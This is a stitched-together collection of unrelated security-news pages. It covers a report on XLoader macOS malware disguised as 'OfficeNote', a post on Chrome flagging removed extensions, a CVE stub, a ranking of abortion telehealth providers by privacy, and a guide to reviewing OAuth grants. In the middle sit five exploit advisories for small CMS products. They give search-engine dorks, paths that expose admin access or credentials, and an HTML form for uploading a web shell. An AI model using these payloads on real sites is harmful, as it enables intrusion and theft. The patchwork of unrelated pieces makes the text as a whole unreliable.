A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."
"The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application

Malware / Endpoint Security

A new variant of an Apple macOS malware called **XLoader** has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote."

"The new version of **XLoader** is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)."

XLoader, first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file.

"Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE with Macs over a decade ago," the cybersecurity firm noted at the time.

The latest iteration of XLoader gets around this limitation by switching to programming languages such as C and Objective C, with the disk image file signed on July 17, 2023. Apple has since revoked the signature.

SentinelOne said it detected multiple submissions of the artifact on VirusTotal all through the month of July 2023, indicating a widespread campaign.

"Advertisements on crimeware forums offer the Mac version for rental at $199/month or $299/3 months," the researchers said. "Interestingly, this is relatively expensive compared to Windows variants of XLoader, which go for $59/month and $129/3 months."

Once executed, OfficeNote throws an error message saying it "can't be opened because the original item can't be found," but, in reality, it installs a Launch Agent in the background for persistence.

XLoader is designed to harvest clipboard data as well as information stored in the directories associated with web browsers such as Google Chrome and Mozilla Firefox. Safari, however, is not targeted.

Besides taking steps to evade analysis both manually and by automated solutions, the malware is configured to run sleep commands to delay its execution and avoid raising any red flags.

"XLoader continues to present a threat to macOS users and businesses," the researchers concluded.

"This latest iteration masquerading as an office productivity application shows that the targets of interest are clearly users in a working environment. The malware attempts to steal browser and clipboard secrets that could be used or sold to other threat actors for further compromise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Variant of XLoader macOS Malware Disguised as 'OfficeNote' Productivity App

Categories: Personal
Tags: chrome

Tags:  browser

Tags:  rogue

Tags:  malicious

Tags:  malware

Tags:  extension

Tags:  remove

Tags:  delete

Tags:  uninstall

We take a look at news that Chrome will soon start asking users if they want to remove outdated extensions.



(Read more...)




The post Chrome will soon start removing extensions that may be unsafe appeared first on Malwarebytes Labs.

Retroactive removals are finally on the way for malicious Chrome browser extensions. Beginning with Chrome 117, Chrome will “proactively highlight to users when an extension they have installed is no longer in the Chrome web store”.

Previously, if you installed an extension which was subsequently unpublished by the developer or removed by Google, the extension you installed would remain in place, even if it was malicious. If, for example, the extension was some sort of data stealer, it would simply continue to steal your data (assuming the infrastructure it sent the data to had not been shut down). 

Now, when an extension is pulled from the web store in one of the following three situations, Chrome users will be notified:

> The extension has been unpublished by the developer.
> 
> The extension has been taken down for violating Chrome Web Store policy.
> 
> The item was marked as malware.

If we’re talking about an “under review” situation, no notification will take place. For example, if a developer is notified that they may have potentially violated one of Google’s policies and has been given time to address or appeal the issue, then a notification will not be triggered.

Violations themselves can result in a wide range of possible outcomes, from immediate suspensions and permanent disabling of extensions to warnings and re-enablement if a violation is addressed to Google’s satisfaction. If the violation involves malware, there’s a good chance there is no way back into Google’s good books. From the violations information page:

> The Chrome Web Store Review team has special procedures for egregious policy violations. In cases such as malware distribution, deceptive behavior designed to evade review, repeated severe violations indicative of malicious intent, and other egregious policy violations, more drastic measures are necessary.
> 
> To limit the potential for these developers to further harm users, the Chrome Web Store team intentionally does not provide details regarding these violations. Additionally, in more severe cases the developer's Chrome Web Store account will be permanently suspended.

In the Privacy and Security settings of Chrome, users will find a “Review” option under the Safety Check setting. It will read as follows:

> Review \[x amount of\] extensions that were taken down from the Chrome web store

Clicking the Review button will take users to their extensions page where they will be given the option to remove all listed extensions. They can also choose to hide the warning and keep the extension if they really want to.

Malware is the exception here though. Extensions flagged as malware are automatically disabled, as they have been in previous versions of Chrome. For everything else, Chrome will state the following:

> Review these extensions that were taken down from the Chrome web store. These extensions might be unsafe. Chrome recommends that you remove them.

Users can select each flagged extension individually, or just hit a “Remove all” button and wipe the lot in one go. If you don’t want to wait for the new feature to roll out in Chrome 117, Bleeping Computer notes that you can give it a try right now by switching on Chrome 116’s experimental "Extensions Module in Safety Check" feature.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Chrome will soon start removing extensions that may be unsafe

Fara Melk Estate CMS version 1.5.0 suffers from an information leakage vulnerability.

    ====================================================================================================================================| # Title     : Fara Melk Estate CMS v1.5.0 unauthorized administrative access Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.20script.ir/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] unauthorized administrative access. allows users to access the administrative interface.[+] Use Payload : /admin-assets/tables.html#[+] http://127.0.0.1/fara/admin-assets/tables.html#Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Fara Melk Estate CMS 1.5.0 Information Disclosure

Evsanati Radyo version 1.0 suffers from a remote shell upload vulnerability.

====================================================================================================================================  
| # Title     : evsanati radyo v1.0 Remote File Upload Vulnerability                                                               |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            |  
| # Vendor    : https://donanimplus.com/b/evsanati-v1-0-radyo-scripti                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] infected file : /upload/yukle.php

[+] Unauthorized administrator access. Allows any visitor to upload malicious files and run them

[+] Some web sites have deleted the upload file so use this code ( note : use after login )

[+] line 5 set your target

<head>  
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />  
</head>

<form action="http://1270.0.0.1/gazipasayalcinemlakcom/upload/yukle.php" method="post" enctype="multipart/form-data">

<div align="center">

<table border="0" cellspacing="0" cellpadding="0">  
  <tr>  
    <td><b>Resmi Secin :</b></td>  
    <td>&nbsp;<input type="file" name="dosya" size="20"></td>  
  </tr>  
  <tr>  
    <td></td>  
    <td><br /><input type="submit" value="Yukle" style="width:220px;"></td>  
  </tr>  
</table>

</div>

</form>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Evsanati Radyo 1.0 Shell Upload

Event Locations CMS version 1.0.1 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Event Locations CMS V1.0.1 - unrestricted files upload Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://codecanyon.net/item/event-locations-phpmysql-plugin/22100679                                               |  | # Dork      : "/events_edit.php?id="                                                                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Allows any visitor to upload malicious files and run them[+] click 2 creat a Nouveau RDV & in Upload Image box upload your Ev!l .[+] go to http://127.0.0.1/cutgg/assets/uploads/ Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Event Locations CMS 1.0.1 Shell Upload

DoorGets CMS version 7.0 suffers from an information leakage vulnerability.

====================================================================================================================================  
| # Title     : DoorGets CMS v7.0 Sensitive information disclosure Vulnerability                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               |   
| # Vendor    : https://sourceforge.net/projects/doorgets-cms/files/latest/download?source=directory                               |    
| # Dork      : "Powered with doorGets ™"                                                                                          |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Payload gives you the username and password for the site script manager.

[+] The problem is caused when the installation folder is not deleted by the user .

[+] In this case the developer made a mistake .

    So that after installation, the script does not delete the installation file or notify the user of changing the folder path or deleting it. 

    It also stores the manager's information in temporary files that any visitor can scan and can use this information to the script control panel.

[+] Use Payload : setup/temp/admin.php

[+] it show you login information for admin access .

[+] http://127.0.0.1/watsingschoolacth/v12/setup/temp/admin.php

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

DoorGets CMS 7.0 Information Disclosure

Emaar Real Estate Agency Directory System version 5.7 suffers from a remote shell upload vulnerability.

    ====================================================================================================================================| # Title     : Emaar – Real Estate Agency Directory System v5.7 Unrestricted File Upload Vulnerability                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : https://codecanyon.net/item/emaar-real-estate-agency-directory-system/23200024?s_rank=92                           |  | # Dork      : "© 2019 Emaar. All Rights Reserved."                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Creat new user & login .[+] Go to http://127.0.0.1/theme.meteros.agency/Emaar/Users/Emaar%20company/edit .[+] upload your Ev!l .[+] Uploaded malicious files can be run remotelyGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Emaar Real Estate Agency Directory System 5.7 Shell Upload

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BUTTERFLY BUTTON PROJECT - BUTTERFLY BUTTON (Architecture) allows loss of plausible deniability, confidentiality.This issue affects BUTTERFLY BUTTON: As of 2023-08-21.



This site uses cookies from Google to deliver its services and to analyze traffic. Information about your use of this site is shared with Google. By using this site, you agree to its use of cookies.

Learn more

Got it

CVE-2023-40735: Advisories

Telehealth companies that provide abortion pills are surging in popularity. Which are as safe as they claim to be?

A new class of health care startups has emerged in response to the US Supreme Court’s decision to overturn the federal right to abortion last year. These “digital abortion clinics” connect patients with health care providers who are able to prescribe mifepristone and misoprostol, a course of care commonly described as the “abortion pill.”

These services, many of which were founded before _Dobbs v. Jackson_, are poised to eliminate a major paradox in the field of reproductive health: Medication abortion is currently the most common way to terminate a pregnancy, yet only 1 in 4 adults are familiar with it, according to a recent study by KFF.

These clinics operate in different ways—some provide live video visits with doctors and nurse practitioners, while others offer asynchronous counseling—but many have experienced a record number of patient orders (and increased VC funding) over the past year. According to Elisa Wells, cofounder of the nonprofit Plan C, their appeal is straightforward. “Their pricing is quite affordable, and there’s convenience in placing an order and getting pills delivered to your mailbox in three to four days,” she says.

Recent data suggests that telehealth clinics have been effective in expanding access to abortion care, especially for people living in remote areas or in states where the procedure has been criminalized, a finding that Wells’ team corroborates. Thanks to a new series of “shield laws” protecting clinicians from out-of-state prosecution—passed in 12 states, including New York, Maryland, and Illinois—these clinics are positioned to expand their reach even further.

Following the lead of other companies in the femtech space (a category that includes everything from kegel trainers to period-tracking apps), leaders at digital abortion clinics like Hey Jane and Choix have publicly expressed their commitment to users’ privacy as they grow. In a recent interview with _Vogue_, Hey Jane cofounder Kiki Freedman said that the service is “HIPAA-compliant and encrypted.” In an interview with _Ms_. magazine this January, a representative from Choix highlighted its “HIPAA-compliant texting platform,” while another interviewee suggested that “most telehealth providers are not checking IP addresses.” (Read more about how HIPAA actually works here.)

A common belief about virtual clinics is that they offer more discretion than their brick-and-mortar counterparts. “There’s definitely a privacy factor—these sites don’t ask a lot of questions,” says Wells. In a 2020 study of over 6,000 abortion seekers, 39 percent reported choosing a telemedicine option specifically to preserve their privacy. While some providers’ intentions seem genuine, privacy experts have pointed out that their services may not be as secure as users expect them to be (even if they are compliant with US law).

This July, a team of researchers at the Markup reported that Hey Jane’s site passed along user information to Meta and Google, the world’s largest digital advertisers. While providers may not restrict access via IP addresses, our analysis found that most providers readily collected them. For telehealth abortion clinics, HIPAA compliance is just one part of the puzzle.

So which virtual abortion clinics take users’ privacy seriously, and which do not? How can users approach these services with safety in mind? Does HIPAA protect all information sent to telehealth providers? To find out, we teamed up with experts to analyze the privacy policies of five popular abortion-by-mail providers: Wisp, Choix, Hey Jane, Carafem, and Aid Access.

While the American Bar Association reported in April that “high-tech tactics” (like sending court orders to femtech apps) have not been used to successfully convict abortion seekers, prosecutors have used women’s text messages and search histories as evidence in a number of abortion-related cases. Because of this precedent, users should proceed with caution when handing their personal information over to telehealth providers. It’s not uncommon for vulnerable data to end up in the hands of third-party brokers who compile digital profiles of users before selling their information to the highest bidder. Michele Gilman, professor of law at the University of Baltimore, says: “Reproductive health data is being sold and transported into a much larger system.”

To make matters worse, the absence of a comprehensive federal privacy law, like the EU’s General Data Protection Regulation (GDPR), leaves the burden of evaluating privacy policies to individual users. Considering that these policies have gotten longer and more difficult to decipher in recent years, this is a serious burden. For our evaluation, we consulted frameworks from the University of Texas at Austin’s Privacy Lab and the Digital Standard to arrive at four core factors.

Here’s what we found:

Created with Datawrapper

Data Collection (PII)

The GDPR’s American cousin, the California Consumer Privacy Act (CCPA) has inspired proposed state legislation that supports greater protections for a specific category of data—personally identifiable information. While PII is broadly defined, Google interprets it as including email address, full name, precise location, phone number, and mailing address.

The safest websites to use won’t collect your PII at all, but offering a mailing address to a virtual clinic is a matter of necessity here. In this context, it’s helpful to distinguish between companies that use your personal information to provide essential services and those that share this information with third parties. Austria-based nonprofit Aid Access fared the best in this category, encouraging users to access the service with virtual anonymity in its policy. Wisp fared particularly poorly here, citing its ability to send specific geolocation data to advertisers.

The majority of providers we analyzed categorize email addresses and the like as “personal information,” which is only protected by HIPAA if it’s stored alongside medical information. This makes it difficult to judge whether it’s being used appropriately.

_**Low Risk:** PII is not recorded, **Some Risk**: PII is used for intended service, **High Risk:** PII is used by third parties_

Law Enforcement

According to bioethics expert Sharona Hoffman, there’s a common misconception that HIPPA protects your medical information from being shared outside of your doctor’s office. The reality, she says, is that “HIPAA isn’t that protective. Consumers need to know that HIPAA has exceptions for law enforcement and public health.”

While the law provides safeguards for a particular subset of information (personal health information), it doesn’t cover all of the information you provide to a telehealth service. Even if it did apply, the rule _allows_ (but does not _require_) health care providers to expose PHI when presented with a search warrant or other legal document. While providers could technically refuse these requests, most don’t. “It’s easier to comply rather than involve your medical office in litigation,” says Gilman.

Aid Access is a notable exception and has a track record of standing up to law enforcement (it even sued the US Food and Drug Administration last year.) When examining privacy policies, UT’s Privacy Lab recommends looking at companies’ willingness to hand over any data in the absence of a warrant or other legal document. Neither Carafem, Wisp, Hey Jane, nor Choix specify that they would require a warrant before sending information to government agencies or other legal entities.

_**Low Risk:** PII is not recorded, **Some Risk:** Legal documents are required to comply with law enforcement, **High Risk:** Legal documents are not required to comply with law enforcement_

Data Control (Deletion)

Sites that offer users more control over their data can deliver better privacy than those that don’t. While low-risk sites will allow you to delete and edit your information freely, some medical information that users provide to virtual clinics will still be out of reach. This is due to state-specific medical record retention laws, which can require health care entities to retain some records for up to 25 years.

Examining how much control companies give users over other information is a better proxy for understanding their general safety. While most of the providers we analyzed included data deletion protocols in their privacy policies, Choix and Hey Jane’s do not. In addition, the latter confirms that it retains data for an unspecified (“reasonable”) period of time.

While Wisp does offer a deletion protocol, it admits that requests can be refused for a variety of reasons, including “exercising free speech” and “internal and lawful uses” on behalf of itself or its affiliates. In addition to responding to requests, privacy-forward organizations will also proactively delete sensitive information, something Carafem does. However, Carafem does not specify a timeline or provide a general deletion request protocol. By contrast, Aid Access allows users to file deletion requests at will for most information.

_**Low Risk:** Users can edit or delete data, **Some Risk:** Users can edit data, **High Risk:** Users cannot edit or delete data_

Third-Party Sharing (Ads and Marketing)

Research scientist and privacy expert Razieh Nokhbeh Zaeem calls personally identifiable information the “currency of the internet” because of the myriad ways individualized data is collected, bought, and sold across industries. While almost all websites work with third parties in some way, telehealth companies should not sell or share your information with advertisers—but many do, as evidenced by Betterhelp’s recent settlement with the Federal Trade Commission.

If a company is collecting sensitive information and using it to market products and services to you, that presents some risk. If a company shares this information with _other_ companies to support _their_ marketing efforts, it’s a major red flag. As the Markup rightly points out in its privacy policy guide, mentions of “personalization” and “improving services” in these documents usually equate to ad tracking.

According to its privacy policy, Hey Jane uses personal data (and PII) to market its own services (“inform you about products”), while Carafem, Wisp, and Choix reserve the right to pass along information to third-party marketing partners. Choix’s policy claims that it “will never sell your data for third-party marketing purpose\[s\]” in one section but reserves the right to disclose data to its affiliates for “marketing” purposes in another.

Rather than limiting or removing the third-party trackers installed on their sites, some providers recommend that users generally opt out of cookie-based advertising within their policies, a strategy that is far from foolproof.

_**Low Risk:** PII is not used for marketing or advertising, **Some Risk:** PII is used for marketing/advertising, **High Risk:** PII shared with third parties for marketing/advertising_

The Bottom Line

In a post-_Roe_ America, virtual abortion clinics provide an essential service, especially for people living in states that criminalize care. Early indicators have shown that they increase access to safe and effective abortion medications, but they don’t offer as much privacy as users are led to believe. With the exception of Aid Access, all of the providers we analyzed have a long way to go when it comes to protecting users’ privacy and earning their trust.

To manage risk when approaching these services (and accessing other information about abortion in hostile states), educators at the Digital Defense Fund recommend reducing your footprint by using privacy-forward search engines like DuckDuckGo, creating temporary email accounts for abortion care, and turning off location tracking on all of your devices.

While engaging in defensive tactics like these are practically useful, legal scholars like Gilman suggest that the reproductive justice movement will advance only when federal and state governments no longer rely on an outdated “notice and consent” paradigm for data privacy. “We need _meaningful_ consent in the reproductive health space,” says Gilman. “Privacy policies today are more like adhesion contracts—suggesting that users ‘take it or leave it.’ It’s not realistic or fair to tell people they can’t engage with technology if they want to protect their privacy.”

Gilman recommends advocating at the state level for better privacy standards, especially if your representatives are considering new legislation. She also encourages people to demand increased protections from private companies, many of which are more flush with the “currency of the internet” than they would have us believe.

The Most Popular Digital Abortion Clinics, Ranked by Data Privacy

From a user’s perspective, OAuth works like magic. In just a few keystrokes, you can whisk through the account creation process and gain immediate access to whatever new app or integration you’re seeking. Unfortunately, few users understand the implications of the permissions they allow when they create a new OAuth grant, making it easy for malicious actors to manipulate employees into giving

From a user's perspective, OAuth works like magic. In just a few keystrokes, you can whisk through the account creation process and gain immediate access to whatever new app or integration you're seeking. Unfortunately, few users understand the implications of the permissions they allow when they create a new OAuth grant, making it easy for malicious actors to manipulate employees into giving away unintended access to corporate environments. In one of the highest-profile examples, Pawn Storm's attacks against the Democratic National Convention and others leveraged OAuth to target victims through social engineering.

Security and IT teams would be wise to establish a practice of reviewing new and existing OAuth grants programmatically to catch risky activity or overly-permissive scopes. And, there are new solutions for **SaaS security** cropping up that can make this process easier.

Let's take a look at some best practices for prioritizing and investigating your organization's grants.

**When should you investigate an OAuth grant?**

Organizations approach OAuth grant reviews in a few different ways. Some opt to review new OAuth grants in real-time, initiating a review any time a user signs up for a new application or connects an integration. An even better practice would be to tailor your Google or Microsoft settings to require administrative approval for any new grant _before_ employees can start using it, giving your team time to investigate and catch anything suspicious.

While reviewing new OAuth grants can help you detect issues early on, oversight shouldn't end once an OAuth grant is in place. It's important to maintain OAuth security hygiene by reviewing grants on an ongoing basis to detect high-risk activity or drastic changes. Monthly or quarterly, security and IT teams should audit existing OAuth grants, check for changes, and prune the grants that haven't been used.

**Tailor your investigations by assessing OAuth scopes.**

OAuth authentication works by assigning access tokens to third-party applications that can act as a proxy for a user's consent, and the scope of permissions granted can range broadly. You can prioritize your OAuth investigations by considering the scope of access each grant provides.

Because different scopes carry different levels of risk to your organization, you can vary the standards of your investigations based on the permissions granted. Focus more attention on grants with scopes that are more likely to give access to critical information, such as personally identifiable information (PII) or intellectual property, or grants that can make changes to an application.

And, you may want to look into tools that can assemble an inventory of all OAuth grants for you, along with scopes and **OAuth risk scores** to make this process easier.

**Evaluate OAuth vendors and their reputations.**

Assess whether or not the vendor responsible for issuing the OAuth grant is trustworthy. For example, you can review the vendor's security page, look at their security certifications, and make sure their security program follows best practices.

Certain reputational signals can help you understand the level of trust other organizations have placed in the grant. For example, Microsoft and Google both have systems for verifying the identity of app publishers, which can give you more confidence in the grant. However, attackers have managed to exploit verified publisher statuses in recent attacks, so practitioners should consider them a helpful signal rather than a definitive assessment of an app's trustworthiness.

The popularity of a particular application, and of a particular grant, can provide yet another trust indicator. If the grant isn't new to your organization, you can consider its popularity within your own workforce by taking a look at how many of your own employees are using it and with what frequency. You can even extend this to the popularity or number of installs outside of your organization in the case that the OAuth application is present in the Google marketplace.

**Check the OAuth grant's domains.**

Before you can rely on a brand's reputation, you need to make sure that the grants listed actually belong to the vendor you're trying to verify. Checking a grant's domains can help you determine whether a vendor actually backs that particular OAuth grant, or if the grant was created by someone trying to piggyback off of a legitimate brand's reputation.

For example, if the grant's reply URL is calendly3.com, you should make sure it's actually a Calendly domain and not a malicious copycat. You should investigate whether the name of the grant matches the URL, and whether the domain has been approved by Google.

**Investigate the publisher email.**

You can gain additional insight into a grant's legitimacy by looking into the publisher email, which is the email address used to register the client ID used by the OAuth token.

Sometimes, an OAuth grant publisher will use a personal email address from a freemail provider like Gmail, which may indicate some risk. If that's the case, you can look into the reputation of that email to understand the likelihood that it may have been used for malicious intent. For example, make sure there are no compromised credentials floating around that could enable a bad actor to take over the email account. Microsoft recently warned of threat actors exploiting stolen Exchange Online accounts to spread spam using malicious OAuth applications. The actors gained initial access to the stolen accounts using credential stuffing attacks, which means compromised credentials would have been an early indicator of risk.

**Evaluate how the vendor is accessing your environment.**

Keeping an eye on how a vendor accesses your environment can help you flag sudden changes and identify suspicious activity. For example, let's say you allow an OAuth grant to access your organization's email. For three months, they access it by calling Google Workspace APIs from Amazon AWS. Suddenly, you get a high-risk API call from a completely different infrastructure (TOR exit node, proxy network, VPS, etc). Perhaps the vendor has been compromised, or maybe the application's credentials have been stolen. If you're monitoring activity related to how these vendors are accessing your environment, this type of change can indicate a potential problem.

Your organization's ability to monitor this activity may depend on the level of service you pay for. For example, Google requires a special license to access an activity stream that reveals what APIs are called within your environment, as well as when and how they're accessed. If you don't pay for the activity stream and an incident occurs, you may be blind.

Microsoft, on the other hand, recently changed their stance on log access by opting to make cloud logs available to all users rather than only premium license holders. The change followed pressure from CISA and others after government email accounts at multiple agencies were hacked, which would not have been discoverable without premium logging available to at least one of the affected parties.

**Monitor the security posture of your OAuth vendors.**

As part of your ongoing monitoring, keep an eye out for high-profile supply chain attacks that may have affected your OAuth vendors. If a provider in your vendor's supply chain experiences a data breach, could it compromise your own security posture?

Similarly, consider the effect of major vulnerabilities on the vendors you rely on. When a widely exploited vulnerability like the ones found in Apache Log4j becomes public, assess whether any of the vendors with OAuth access to your environment might be affected. Similarly, you should pay attention to vulnerabilities within OAuth grants themselves, like the Microsoft "nOAuth" misconfiguration that can enable bad actors to take over affected accounts. If you believe your vendors may be affected, you may choose to take an action like revoking those grants until you know that the vulnerability has been resolved.

**Investigate and revoke high-risk OAuth grants with Nudge Security.**

Nudge Security is a SaaS management platform for modern IT governance and security. It provides complete visibility of every SaaS and cloud asset ever created by anyone in your org, including OAuth grants. The platform provides an inventory of every app-to-app OAuth grant ever created in your org, along with OAuth risk insights like grant type, age, number of scopes, who granted access, and an overall OAuth risk score. With this visibility, users can easily conduct OAuth reviews, assess risk, and even revoke OAuth grants with just two clicks. **Try it for free**.

**Note:** _This article was expertly written and contributed by Jaime Blasco, CTO and co-founder of Nudge Security._

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google